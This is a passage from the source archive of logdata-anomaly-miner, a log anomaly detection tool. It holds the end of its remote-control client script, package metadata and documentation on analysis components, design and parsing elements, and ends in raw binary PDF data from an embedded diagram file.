        sys.exit(1)
    # The file is read in binary mode, so these entries are bytes with their trailing newline, whereas --exec
    # entries are str. NOTE(review): assumes put_execute_request() accepts both forms - confirm in the handler.
    with open(args.exec_file, 'rb') as exec_file:
        command_list += exec_file.readlines()
string_response_flag = args.string_response
if not command_list:
    print('No commands given, use --exec [cmd]')
    sys.exit(1)

remote_control_socket = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
try:
    remote_control_socket.connect(remote_control_socket_name)
except socket.error as connectException:
    print(f"Failed to connect to socket {remote_control_socket_name}, aminer might not be running or remote control is disabled in "
          f"configuration: {str(connectException)}")
    sys.exit(1)
remote_control_socket.setblocking(True)

control_handler = AnalysisChildRemoteControlHandler(remote_control_socket)

# Commands are sent one at a time; each request is fully sent and its response fully received before the next one.
for remote_control_code in command_list:
    control_handler.put_execute_request(remote_control_code, remote_control_data)
    # Send data until we are ready for receiving.
    while not control_handler.may_receive():
        control_handler.do_send()
    while not control_handler.may_get():
        control_handler.do_receive()
    request_data = control_handler.do_get()
    # Bytes 4..7 of the response record carry its type; the record layout itself is defined by
    # AnalysisChildRemoteControlHandler and only the b'RRRR' type is handled here.
    request_type = request_data[4:8]
    if request_type == b'RRRR':
        try:
            # Payload is a JSON list: [exception text or None, response value]; both are printed verbatim.
            remote_data = json.loads(request_data[8:])
            if remote_data[0] is not None:
                print(f"Remote execution exception:\n{remote_data[0]}")
            if string_response_flag:
                print(f"Remote execution response: {str(remote_data[1])}")
            else:
                print(f"Remote execution response: {repr(remote_data[1])}")
        except Exception:
            print(f"Failed to process response {repr(request_data)}")
            traceback.print_exc()
    else:
        # NOTE(review): no try/finally around the loop, so this exit path leaves the socket to be closed by the OS on
        # process termination rather than by the close() below.
        raise Exception(f"Invalid request type {repr(request_type)}")
remote_control_socket.close()
logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/metadata.py000066400000000000000000000016731500476301700300710ustar00rootroot00000000000000
# Package metadata; __version_string__ is what the command line tools print for --version.
__authors__ = ["Markus Wurzenberger", "Max Landauer", "Wolfgang Hotwagner", "Ernst Leierzopf", "Roman Fiedler", "Georg Hoeld", "Florian Skopik"]
__contact__ = "aecid@ait.ac.at"
__copyright__ = "Copyright 2023, AIT Austrian Institute of Technology GmbH"
__date__ = "2023/01/20"
__deprecated__ = False
__email__ = "aecid@ait.ac.at"
__website__ = "https://aecid.ait.ac.at"
__license__ = "GPLv3"
__maintainer__ = "Markus Wurzenberger"
__status__ = "Production"
__version__ = "2.8.0"
# Padding that centres the version below the 29 character wide banner line; the nested max() is redundant (the
# inner one already clamps at 0) but harmless.
_indentation = int(max(0, max(0, (29 - len(__version__)))) / 2)
__version_string__ = """ (Austrian Institute of Technology)\n (%s)\n%sVersion: %s""" % (
    __website__, " " * _indentation, __version__ + " " * _indentation)
__all__ = ['__authors__', '__contact__', '__copyright__', '__date__', '__deprecated__', '__email__', '__website__', '__license__',
           '__maintainer__', '__status__', '__version__', '__version_string__']
# Keep the helper out of the module namespace (it is deliberately not in __all__).
del _indentation
logdata-anomaly-miner-2.8.0/source/root/usr/share/000077500000000000000000000000001500476301700221035ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/share/doc/000077500000000000000000000000001500476301700226505ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/share/doc/logdata-anomaly-miner/000077500000000000000000000000001500476301700270315ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/share/doc/logdata-anomaly-miner/aminer/000077500000000000000000000000001500476301700303045ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/share/doc/logdata-anomaly-miner/aminer/Analysis.txt000066400000000000000000000242541500476301700326370ustar00rootroot00000000000000Preamble: ========= This document lists all analysis components, that are components that emit events to the reporting infrastructure on certain conditions. The components in the following list are annotated with short codes describing their properties to speed up search for suitable analysis component. Property codes: * (A)utoconfiguration: This component may learn from the input data and adapt itself to new inputs. * (F)iltering: This component just filters input and distributes it to other analysis components. * (H)ardwired: This component generates events by hard rules. This is the opposite to "statistical triggering". * (N)ondeterministic: This component may react differently to the same input in two runs. * (R)eporting: This component will generate analysis reports for evaluation by an analyst. Those components can be very useful in the configuration phase to understand the processed data better. * (S)tatistical triggering: This component uses statistical methods to trigger on unexpected data. Such components may miss relevant events or cause false-positives. 
List of components: * EnhancedNewMatchPathValueComboDetector (AH): Same as NewMatchPathValueComboDetector but also supporting value transformation and storage of extra data. * HistogramAnalysis.HistogramAnalysis (R): Create histogram reports for parsed values. * HistogramAnalysis.PathDependentHistogramAnalysis (R): Create path-dependent histogram reports. * MatchValueAverageChangeDetector (AS): Detect when the average value of a given parsed value changes over time. * AtomFilters.MatchValueFilter (F): Use the value of a parsed element to forward input data to other analyzers. * MatchValueStreamWriter (F): Forward selected input data, e.g. as a CSV list, to other components via a stream, e.g. to perform analysis in another tool. * MissingMatchPathValueDetector (AH): Detect when values for a given path are not received for a longer timespan, e.g. a host, service or address stopped sending/reporting. * MissingMatchPathListValueDetector (AH): Like MissingMatchPathValueDetector but looking at more than one match path for key extraction. * NewMatchPathDetector (AH): Generate events when new parser paths are found. * NewMatchPathValueComboDetector (AH): Same as NewMatchPathValueDetector but considers the combination of values for a list of data paths, e.g. source IP, destination IP, destination port for link analysis. * NewMatchPathValueDetector (AH): Generate events when new parsed values are observed for a given path, e.g. new MAC addresses, user names, ... * TimeCorrelationDetector (ANR): Try to detect time correlations and report them. * TimeCorrelationViolationDetector.TimeCorrelationViolationDetector (H): Detect changes in time correlation on a given ruleset. * TimestampCorrectionFilters.SimpleMonotonicTimestampAdjust (F): Adjust decreasing timestamps of new records to the maximum observed so far to ensure monotonicity for other analysis components.
* TimestampsUnsortedDetector.TimestampsUnsortedDetector (HR): This detector is useful to detect algorithm malfunction or configuration errors, e.g. invalid timezone configuration. * AllowlistViolationDetector (FH): Check all inputs using a ruleset and create events, forward input to other components. HistogramAnalysis.HistogramAnalysis: ==================================== This component performs a histogram analysis on one or more input properties. The properties are parsed values denoted by their parsing path. Those values are then handed over to the selected "binning function", which calculates the histogram bin. * Binning: Binning can be done using one of the predefined binning functions or by creating your own subclasses of "HistogramAnalysis.BinDefinition". * LinearNumericBinDefinition: Binning function working on numeric values and sorting them into bins of the same size. * ModuloTimeBinDefinition: Binning function working on parsed datetime values but applying a modulo function to them. This is useful for analysis of periodic activities.
* Example: The following example creates a HistogramAnalysis using only the property "/model/line/time", binned on a per-hour basis and sending a report every week:

from aminer.analysis import HistogramAnalysis
# Use a time-modulo binning function
modulo_time_bin_definition=HistogramAnalysis.ModuloTimeBinDefinition(
    3600*24, # Modulo values in seconds (1 day)
    3600, # Division factor to get down to reporting unit (1h)
    0, # Start of lowest bin
    1, # Size of bin in reporting units
    24, # Number of bins
    False) # Disable outlier bins, not possible with time modulo
histogram_analysis=HistogramAnalysis.HistogramAnalysis(
    aminer_config,
    [('/model/line/time', modulo_time_bin_definition)],
    3600*24*7, # Reporting interval (weekly)
    report_event_handlers, # Send report to those handlers
    reset_after_report_flag=True) # Zero counters after sending of report
# Send the appropriate input feed to the component
atom_filter.add_handler(histogram_analysis)

HistogramAnalysis.PathDependentHistogramAnalysis:
=================================================
This component creates a histogram for only a single input property, e.g. an IP address, but for each group of correlated match paths. Assume there are two paths that include the input property but that separate after the property was found on the path. This might be for example the client IP address in ssh log atoms, where the parsing path may split depending on whether this was a log atom for a successful login, logout or some error. This analysis component will then create separate histograms, one for the path common to all atoms and one for each disjoint part of the subpaths found. The component uses the same binning functions as the standard HistogramAnalysis.HistogramAnalysis, see documentation there.
* Example: # Perform path-dependent histogram analysis: from aminer.analysis import HistogramAnalysis # Use a time-modulo binning function modulo_time_bin_definition=HistogramAnalysis.ModuloTimeBinDefinition( 3600*24, # Modulo values in seconds (1 day) 3600, # Division factor to get down to reporting unit (1h) 0, # Start of lowest bin 1, # Size of bin in reporting units 24, # Number of bins False) # Disable outlier bins, not possible with time modulo path_dependent_histogram_analysis=HistogramAnalysis.PathDependentHistogramAnalysis( aminer_config, '/model/line/time', # The value properties to check modulo_time_bin_definition, 3600*24*7, # Reporting interval (weekly) report_event_handlers, # Send report to those handlers reset_after_report_flag=True) # Zero counters after sending of report # Send the appropriate input feed to the component atom_filter.add_handler(path_dependent_histogram_analysis) AllowlistViolationDetector: =========================== This detector manages a list of allowlist rules to filter parsed atoms. All atoms not hit by any allowlist rule will cause events to be generated. When an atom is matched by a rule, it will be regarded as allowlisted by default but there is also an option to call user-defined functions on a matching rule via MatchAction elements, e.g. to forward the atom to another analyzer in one pass. Predefined actions are: * EventGenerationMatchAction: Generate events, when a rule matches, e.g. to report interesting matches, violations or for debugging. * AtomFilterMatchAction: Filter out the parsed atoms on match and forward it to other handlers, e.g. analysis components. * Rules: The ruleset of this detector is created from classes defined in aminer.analysis.Rules. 
See below for a short list of supported rules, or the source for full documentation:
* AndMatchRule: match only if all subrules match
* DebugMatchRule: print debugging text when matching
* DebugHistoryMatchRule: keep history of matched LogAtoms
* IPv4InRFC1918MatchRule: match IPs in private networks
* ModuloTimeMatchRule: match cyclic time values, e.g. nighttime
* NegationMatchRule: match only if other rule did not
* OrMatchRule: match if any subrule matches
* ParallelMatchRule: match if any subrule matches but do not stop at first successful match
* PathExistsMatchRule: match if parsed data contains given path
* StringRegexMatchRule: match if parsed data string matches given regular expression. If applicable, Value[X]MatchRule should be used instead.
* ValueDependentDelegatedMatchRule: select match rules according to values from parsed data
* ValueDependentModuloTimeMatchRule: like ModuloTimeMatchRule but select limits according to values from parsed data
* ValueListMatchRule: match if value is in given lookup list
* ValueMatchRule: match if parsed data contains specific value
* ValueRangeMatchRule: match if parsed data value is within given range

* Example:

# Run an allowlisting over the parsed lines.
from aminer.analysis import Rules
from aminer.analysis.AllowlistViolationDetector import AllowlistViolationDetector

violation_action=Rules.EventGenerationMatchAction('Analysis.GenericViolation', 'Violation detected', anomaly_event_handlers)

allowlist_rules=[]
# Filter out things so bad, that we do not want to accept the
# risk, that a too broad allowlisting rule will accept the data
# later on.
allowlist_rules.append(Rules.ValueMatchRule('/model/services/cron/msgtype/exec/user', 'hacker', violation_action))
# Ignore Exim queue run start/stop messages
allowlist_rules.append(Rules.PathExistsMatchRule('/model/services/exim/msg/queue/pid'))
# Add a debugging rule in the middle to see everything not allowlisted
# up to this point.
allowlist_rules.append(Rules.DebugMatchRule(False)) # Ignore hourly cronjobs, but only when started at expected time # and duration is not too long. allowlist_rules.append(Rules.AndMatchRule([ Rules.ValueMatchRule('/model/services/cron/msgtype/exec/command', '( cd / && run-parts --report /etc/cron.hourly)'), Rules.ModuloTimeMatchRule('/model/syslog/time', 3600, 17*60, 17*60+5)])) atom_filter.add_handler(AllowlistViolationDetector(allowlist_rules, anomaly_event_handlers)) logdata-anomaly-miner-2.8.0/source/root/usr/share/doc/logdata-anomaly-miner/aminer/Design.txt000066400000000000000000000200101500476301700322470ustar00rootroot00000000000000Preamble: ========= This document describes the requirement, design and implementation of aminer. For using it, the general "README.md" may suit your needs better than this document. Requirements: ============= * IO-Event triggered stream processing of messages to avoid CPU peaks and allow timely generation of alerts. * Sensible alerting model, e.g. sending of aggregated report 10sec after first anomaly, then have gracetime of 5min. When more events occurred, send another report and double grace time. * Have "environment" flags, e.g. maintenance mode to reduce messages under known procedures. Example: rsyslog should only restart during daily cronjobs, but at any time during maintenance. Design: ======= * Configuration layout: The behaviour of aminer is controlled by 3 different configuration data sources: * config.py: This configuration file is used by the privileged parent process for startup and launching of child process. To avoid parsing and loading larger amounts of configuration into a privileged process, this configuration may contain only the minimal set of parameters required by the parent process. * analysis.py: This (optional) configuration file contains the whole analysis child configuration (code). When missing those configuration parameters are also taken from the main config. 
* /var/lib/aminer: This directory is used for persistence of runtime data, e.g. learned patterns, statistical data, between different aminer invocations. * Loading of python code: aminer does not use the default dist/site-packages to load code. The rationale behind that is: * Avoid unused code being loadable or even loaded by default: that code may only increase the attack surface or the memory footprint. * Reduce the risk of side effects of unrelated updates: even though it is not good practice, some python modules try to detect the existence of other modules to adapt their behaviour when available. This may cause unintended runtime changes when installing or updating completely unrelated python software. * Log file reading: Those problems have to be addressed when processing a continuous stream of logging data from multiple sources: * High performance log reading conflicts with proper EOF detection: The select() call is useful to react to available data from sockets and pipes but will always include any descriptors for plain files, as they are always readable, even when at EOF. To detect availability of more data, inotify would have to be used. But while waiting, no socket change can be detected. Apart from that, the unprivileged child may not access the directories containing the opened log file descriptors. * Log files may roll over: the service writing it or a helper program will move the file aside and switch to a newly created file. * Multiple file synchronization: When processing messages from two different log data sources to correlate them, care must be taken not to read the newest messages only from one source and fall behind on the other source. Otherwise messages generated with quite different time stamps might be processed nearly at the same time while messages originating at nearly the same point in time might be separated. Solutions: * High performance log reading: No perfect solution possible.
Therefore a workaround similar to "tail -f" was chosen: Use select() on the master/child communication socket also for sleeping between file descriptor read attempts. After the timeout, handle the master/child communication (if any), then read each file until none of them supplies any more data. Go to sleep again. * Roll over: The privileged process monitors whether the file currently read has moved. When a move is detected, notify the child about the new file. This detection has to occur quite timely as otherwise the child process, not knowing about the new file, will continue processing and miss relevant correlated patterns due to reading only some of the currently relevant streams. FIXME: readlink best method? Inotify? * Roll over in child: The challenge is to completely read the old file before switching to the new one. Therefore the child relies on the notifications from the parent process to know about new files. When a new file is received, the old one is fstat'ed to know the maximum size of the file, then the remaining data is read before closing the old file descriptor. * Multiple file synchronization: Useful file synchronization requires a basic understanding of the reported timestamps, which implies the need for parsing. Also timestamp correction should be performed before using the timestamp for synchronization, e.g. host clocks might drift away or logging may use the wrong timezone. When processing multiple log data streams, all parsed log atoms will be reordered using the timestamp. One stream might not be read at all for some time, when an atom from that stream has a timestamp larger than those from other streams. When reaching the end of input on all streams, marks on all reordering queues of unforwarded parsed log atoms are set. Everything before that mark will be forwarded anyway after a configurable timespan. This should prevent bogus items from staying within the reordering queue forever due to timestamps far in the future.
* Input parsing: Fast input dissecting is key for performant rule checks later on. Therefore the algorithm should have the following properties: * Avoid passing over the same data twice (as distinct regular expressions would do), instead allow a tree-like parsing structure, that will follow one parsing path for a given log-atom. * Make parsed parts quickly accessible so that rule checks can just pick out the data they need without searching the tree again. * Rule based distribution of parsed input to detectors: Implementation: =============== * aminer: This is the privileged master process having access to logfiles. It just launches the AminerAnalysisChild and forwards logfiles to it. * AminerAnalysisChild: This process runs without root capabilities and just reads logfiles and stores state information in /var/lib/aminer. AminerAnalysisChild processes data in a multistage process. Each transformation step is configurable, components can be registered to receive output from one layer and create input for the next one. * aminer_config.build_analysis_pipeline: This function creates the pipeline for parsing the log data and hands over the list of RawAtom handlers (those who will receive new log-atoms) and a list of components needing timer interrupts. Thus the need for multithreaded operation or asynchronous timer events is eliminated. * TimeCorrelationDetector: This component attempts to perform the following steps for each received log-atom: * Check which test rules match it. If no rule matched the data, keep it for reference when creating new rules next time. * When a match A was found, go through the correlation table to check if any of the other matches has matched recently. If a recent match B had occurred, update 2 counters, one assuming that A* (hidden internal event) caused B and then A, the other one that B* caused B and then A. * If the maximum number of parallel check rules has not been reached yet, create a new random rule now using the current log-atom or the last unmatched one.
* Perform correlation result accounting until at least some correlation counters reach values high enough. Otherwise discard features after some time or number of log atoms received when they did not reach sufficiently high counts: they may be unique features that are unlikely to be observed again. This detection algorithm has some weaknesses: * If match A is followed by multiple matches of B, that will raise the correlation hypothesis for A*->A->B above the count of A. * For the A*->A->B hypothesis, two As detected before the first B will increment the count only once, the second pair is deemed non-correlated. logdata-anomaly-miner-2.8.0/source/root/usr/share/doc/logdata-anomaly-miner/aminer/ParsingModel.txt000066400000000000000000000037551500476301700334410ustar00rootroot00000000000000Preamble: ========= Sorry, this part of the documentation was not written yet! Check the source code documentation headers from files in directory /usr/lib/logdata-anomaly-miner/aminer/parsing. Here is a short list of the most common model elements with a short description: * AnyByteDataModelElement: Match anything till end of a log-atom. * Base64StringModelElement: Parse base64 strings as binary data. * DateTimeModelElement: Simple datetime parsing using the python datetime module. See also MultiLocaleDateTimeModelElement * DebugModelElement: Output debugging information while parsing a log-atom * DecimalFloatValueModelElement: parsing of float values * DecimalIntegerValueModelElement: parsing of integer values * DelimitedDataModelElement: Same as AnyByteDataModelElement but include data only up to the given delimiter string. * ElementValueBranchModelElement: conditional branching based on previously parsed values. * FirstMatchModelElement: Branch the model taking the first branch matching the remaining log-atom data. * FixedDataModelElement: Match a fixed (constant) string. * FixedWordlistDataModelElement: Match one of the fixed strings from a list. * HexStringModelElement: Match a hexadecimal string.
* IpAddressDataModelElement: Match an IPv4 address. * JsonModelElement: Parse JSON data and compare it with an expected key-dictionary. * JsonStringModelElement: Compare JSON string keys with an expected key-dictionary. * MultiLocaleDateTimeModelElement: Parse datetime elements with leap year correction, multiple locale support. * OptionalMatchModelElement: Match subelements zero or one time. * RepeatedElementDataModelElement: Match subelements a given number of times. * SequenceModelElement: Match all the subelements exactly in the given order. * VariableByteDataModelElement: Match variable length data encoded within a given alphabet. * WhiteSpaceLimitedDataModelElement: Match string till next whitespace. * XmlModelElement: Parse XML data with an expected key-dictionary structure. logdata-anomaly-miner-2.8.0/source/root/usr/share/doc/logdata-anomaly-miner/aminerremotecontrol/000077500000000000000000000000001500476301700331215ustar00rootroot00000000000000Readme.txt000066400000000000000000000006671500476301700350110ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/share/doc/logdata-anomaly-miner/aminerremotecontrolThis document contains step by step instructions on what needs to be done to fully support a new Detector in the aminerRemoteControl. - add the Detector class to the exec_locals in the AnalysisChildRemoteControlHandler class. The format needs to be 'NewDetector':aminer.analysis.NewDetector. - if the class supports allowlisting events add it to the checks of the AminerRemoteControlExecutionMethods.allowlist_event_in_component method. 
logdata-anomaly-miner-2.8.0/source/root/usr/share/doc/logdata-anomaly-miner/diagrams/000077500000000000000000000000001500476301700306205ustar00rootroot00000000000000activity_diagram.drawio000066400000000000000000001345301500476301700352760ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/share/doc/logdata-anomaly-miner/diagrams activity_diagram.pdf000066400000000000000000001623101500476301700345570ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/share/doc/logdata-anomaly-miner/diagrams%PDF-1.7 % 7 0 obj << /Filter /FlateDecode /Length 6775 >> stream x=َ$9nhFD  0S{?/;j]AJqTF*2*+;k\R!HȀT8}X @)yx|>`ϑsHb %#_n ⯘s?voi˴h>hd@B3RYt5f̿ CQ|l%gϪleR%O-e IÏCdK ?BJ $χoc~CpN:|~0RJEPb*HBFe$PC-*֢\ > AJx" `> =J)c949  mЏ4x5=> v1#$`P" Ԙ@CRE%jMԨ1NYe#;EMlt7CiܢYŃ-*1EΛM#}U|;.O^ ‹e_IM}L\ITEX|Ս00  >Ƨ}6{C : s<<A8(O<J++D^SVrz.`uZ[xVtV}Fs 3 +I:JPK 3 DQm4O9ayذ<)]Ñ25&wܪp `Q,Z&`۶] 吢I|e_,n7 tJJ"̀O"B"!߿tM^aֽW8oru :+bbGm&aLC@AD;@S Qa=Pm2VۣQr^[ݚGq*ܽ 8woi-W{8 YidO''%D*8ҸΘOMTK oZ 7~_JUǟ:>HK׊+~A0F46Bb772hXa@`>zیDeeGۖ0 %h6:h:{JAJD.`K(]{+AL?,BxbUyֵv0@41N5tKڠfP_`Ջ`9c3rM]BxpAs< j " TJgj ~H]s/.M""?{Gn!ӾNjmqBJl[|z& Ҏym.:텕Oi_Ǎx,Wx<\+͈GSnFnτ=qANInBy/j~ ~{z%f +y¹;qRc8+][FY5)ĵ3NgQIw&AnL˞ u?k\rmU$#(4Tr+zWX H3e? (9kܺOjj2H&[qzh`3nm_s#D8 KZuf[nk\9+<# nK-$f(2tviՁIb:7_Ko`R_5߼`KztY$҂h^w]JZR=5ɬsQp yœ,i?dʂqS&mfiսlfk{1`Rr!!/k1.޷(tI ak>ccrls,z8)i8M 0\\XV5sioq7˭;m.oѧh(XY,r,r~_KKGD.O7n79WnGnGn9>$^'p®L \3׾4JwUnޭ"Ϝ欭gd>mA6BTasn W( ڀ_a>5o-˶P%Gzyҽ#zwLєGJP5R4wcBM-W--&Tu3Oyb.<1jhi5O\5Oiu8'¥b'l,cJ䕍 .ж4ZuA|[O2غTnU2q,y!q{NDIJ|ٯB|{$vko&"[ D4 p\%`2AJ,n9&Cor+ rV]-):L7-V1y;^ 3Fxr0@<<//mK¼\K@4|{$-ӳU8Kv>S. 
|EYv/bEw#dLV'VtuW1>$~!gN𴰍 b^J{sZ`Ⱥj̸ҹ [Ts}x]+,iHCyțKj&2yiz"S_vplljaAJЇyb69s+`8bZV&#.*e/~5__qeWά~|mZb9X¨@α,">`'ΏrY?o|53Y Z7+nbDzZgD4U1<1U[!ͯ0-,qa,Z$xSi"a_q .{AwGcɆ[w!d20R^4`nS[#j\ta% UXK>4rH%RB!s4KY0D_IA}92k\F!*ժ ˯Mbc`HWIaS)zexl$!Zei?-!BX8FlV]Fq}c\(xJjbǢK=«_[Nuۂ"?O=m'UaixzY5)V*X]].kѴ~O|kŧʭƃ$h׷kƦX?X%-Y9|zLB};:zL?9 ɱL*F?j+aw0JW13 tG?O{' F?U11U[ͯM6R8[ƙ;IC.5~OVzEғbtC#iVa9朵+쏯V,GF$U *,Mf7MU̶hc2M$n擙%+k')R$iҜefaZ9b#v݋E]oO%`kC, ƅ*=+w !tNibMJf s7}yw¤q:)GӾnˍ|JlhqkB3U1.}Nb52&`98QR%CMEbF9^n9r%F10V)Jv:Uqhkw7JU&V2"NȋNZɰՕ 6G ;#hQ{Q>ey6F4ndS'ąhb;qc_*٥d(P=D[.z2ܤ'N%{Nd΂[suuOHs}2޳\TW-_h}ؤ>vz ҉)'e׋Î ^4Y·K#Q["#Ċ*L5i!%_fEc"vW(u>mRR\|iKY5Z(膕FMӢ%{dqӽ? Pru.ޝO1֘ԓ9ènClAzwXWg<6Rȶ|EhƶC^Vبlo~m5}C +vҳmѼCgM=ҵչwMVvh}+ƧPXJ"淼梻 R=Y Uc\Xs W55&Jp-Ӷ) Q jK_H"-] }Y4gqUkƅwpJ*iYޠ6^.l~B}l ޸I~}Ǿw/kS endstream endobj 200 0 obj << /Length1 40008 /Filter /FlateDecode /Length 19466 >> stream xx\Ź͜sV]UbڕUj[͖eKֱ-u14"l;\I0HkΜB.sΜ93|3MYp0emt m7m@ y;bEcmؼ5!GA:O`۳~Ujǃ+0nPdz4ޯ> sx{M:4o|@招枟>auUݵضudg$T|ێu2%"@;- d̀F w@-y ` t} Ew$a%B m+s&h9T˜L\1'<| WIa[a PP%avVv|NFX ;`#t: gJF ;`=; a N\`DyD(# Io\A = al];c6Hy`6#喾Eu uU@Rm0 4 ls-%)6.u0lJ$!"I1wPéelK*Ho;`H*/nN.$7v°-Igo$RuRuJroA +H#RַsFX90!#P `SZ2#pA'X p3ww ߅f0p@v]ɉ4z a'iI{߻S'-S tR\#idh2yG;YN PY>M΁U0kAe 1 [$ ðԏ (P[嶴vypl5ug%. |߻%p·}.p1\"1R .p\ WSU3l/5ES5Kenp _[N5 ng_vp!ICIzI7 srL{FZlrIχ %ir$!/Th=T&ϖ"wT/-s$uE龟o[*Io­2]so { ߆n1>wn!2Ra 0Ϟ?>0<cSԌ<))/8!< ?{ MufXvy[mmOWnl}~rJ?ývr?zۻIFWμ}g=ߩO9۝3}y}???_J5>w~ 7ƝQq!@twؾmͱs7mް~vUXtI{[kKsƆEH*+e ZFNQ #k4@\ 45w`Px ąA!xj0 N O !3!Eĸ0^Ѿ8 #s^'RN >R[qEPh+EquWQ'EB/ y]A)(q.XDq$j]?ɒOΓ2IW找SFC  dDrΞOLd!8 jHu6G\P+85I^=B u.%e#귵+ڱWmYKOqku>V{q6=|c*ƐDuWŗဟ3?oL@]~j 4EhL$FG5 Fh'ewnEycЕcQteއ-•ݽẁE}cʎއ䋉/$8HJX#=8 =UH{(@0?C L,E!EQ0P'QZC ;@Cgˡ50'FCzpTjڨo qeT"8l@F;:%:0RC-"~fH9 т^3[ `D>黯o<ÁV24"ѿ}ã}W8(PqCXeE?B#_EՁEqBytGk`/mkIRH$ݽ|}** k}B\l+g .$^WlkfqmpU\+W8AO7h? nګ%MqU %R u+h-q>d Im+C*84 P˃G}uuG)uqmA\M$\_@ePG3/ĵAK\kCsD)Gkq}% ^IAKH@g8$*qcy0~`-낁JYC:A &%7\;;? 
яBsy}xT^ J88DF8Mh Cee / K$m 4q$A1u aԗ}j 4'G- .Z :g3W WH_oc} FQ _R3W6 Uy( 5CBZ/56uhP)I8q'~`0' q/Gd(XF˳ld >Ww >?'yT|ѸnB\Bp`p1 zQ!uqd k(1qe:jF{~ "4| Iz!4W߂<P$i Wg}[4FJUCgo| "'B]NRxԹSy< ģ~-qw\=Rf*FJi hơU8TP@ ,Ŀt)V}zK8"+pzy6͹JT~: ?'-r~,iFwœ na[!C8ݐg@߿ϯB/_߻PrJ A4/$\7 pv>>/hucZ ? gd|**ϡBƗ=E?S?$T'?1~+Ѝ_ns_%_z@OA=~ DO )P @p'~ #ZjRF.abF0r#^F.dF0r>#9]ddlcd+#[HsFFzF1"22ZF`d #gd#0>FzYrFzfNF:YRF0H#0H#idzFYH-#QF"0jF02*F*`y1RH #Ō1RH#1f$Fb$HLFd0gD`g$4FR1ˆ#nF\8q0bgƈ #fFL10gDLj #jFT(Q01ALP)F&9G|?37F_y3#22ȟy##o1F~y2ߌy_3 #b䗌32#/1"#?c䧌1#3#?b䇌<>#04#c#S|<OmRBlpxj(l0La|.) PXCa5O](Ca%> VPXNB7. :(, (Rh5 Li'b V>}m|S>"4^ iU*)TP(0&VFRBBMBO!BB. h! Af& @)QH࣐2O`/xR>\IA=lz()3=-}.X9XA%)LIA$u}Bc '鳏C {۸OR_(O=. ޡ6#(iQכ[o oPx> ר~M A~I]q >^w/% /RϟQ)Px1s~DA~@ OS|K8''(.p񸳇OΆwѸ|FK]Hq8SM< (0BAom94ĶА)(Ka40 4giuDrZ (lshWҤz)]N_CSEBǸ#:;;z/w\:i2nDa1lwn +_W780_-(q[t[H]־q+Q* b;ǭ+n??_O?߫GG[K>S~?Ms{[[{/࿦߬ߤUQ~?~?~?eu%ukt濠 q@Ň\Գg}=}HϷu߅{e_ԦCs=_9Ю.ǮBv]h°˲Kv9v,q`G|bA|;0@DDxtq{֞mlYg7Vn>g}س3TgrgMeC=*WsheO_eo ./9Uygi咞%\oli;R|gqecOWC%UH,$KR}C|Q| }}͜§-ދz95?vgu4\(ab<+j4;;qß pH@ $Ǐ '=ȟtRBAw5ָf9qtex7<.Nx;xx+x x38">D DD< ""^"^"AC Ax x5D D|x%D "^"^"w@ĝ 2Rq; D "n7@ċAč q=DD\ "# Bq5xx> D\ "灈@ĥ q1D\".烈@aq.8D "@Aq&8"A@ĩ b8D{@n D;@v Dl[@f Dl@zDk@j D+jӵM>}4]"J@D O@DN>}"ADD @D " DmADo"=w 7AD7  ߀^ "5ѯ@DDs @D/~")' @D?="zD#ADς~"> N D 'ADO="zDaQDt D(0hD4"="Dt^w@D"6Nѷ@D}Dtvm [AD"fM n}DtzїAD_]"DE5 /] "DtDt9e KAD.ր5`րp\0{5i =Mki 9#cZOki :[5`Ħ5i 45`xZ6Lki X7 Mki րi X35ZVMk9rZ5wZVLki րi ր_6]KktͷM|tͷL|t7Mo隯::1YX05TiP<Q'`>:zY_W?AE l< 6'P!2󅓯Mت 'PoUoFq/H1Dqkb5BGHa H8öpQqajC(B奥%5x^Y(a’_YyE WZ9č~[:èRT-:h:'X]*NQgW,h5dJmMsl-L'_QNEiNN`U$I *.7/7- bui6!~Ag*I#iM@b_? ɷ,-I(|ނ)-(}h6 yzԞf<i0X !`uz=DlUUVwVUe-LXKP_֠pM 97Kh&p/r dBV[]d |ЮUl&NgHFoVbR\~ZڠE ~5jJϥכ41믙8;R P  j-feDǀyAM4;vgԌڝN} Gy$p .H?G*M$:lA{2%A· bKxSV\Δ֋:H?DDj1U I%/)!- \E9i@⬿ŊƑCMRIÉHHqFh_sVrTʥCۛpQh C%pmU S)+[Ou{u!4pCgMR\u_^нҦ׹¶ySK'_[OUVtC=|OaPCk‚,Ű,p"'"p".bXb \ &BCۻ\E`L"/N*Ⲽ|7$PJ#1{=Hk ~w_T* /_]Vipi?;n3vG*Y)^z"K4Ql-xaKИ"L}c&OLJr<>Es~ﮩw% ֭G˶{_owRZnxO5 ۫4A<@=%I\,TYrRe%5ZHI Mx ! 
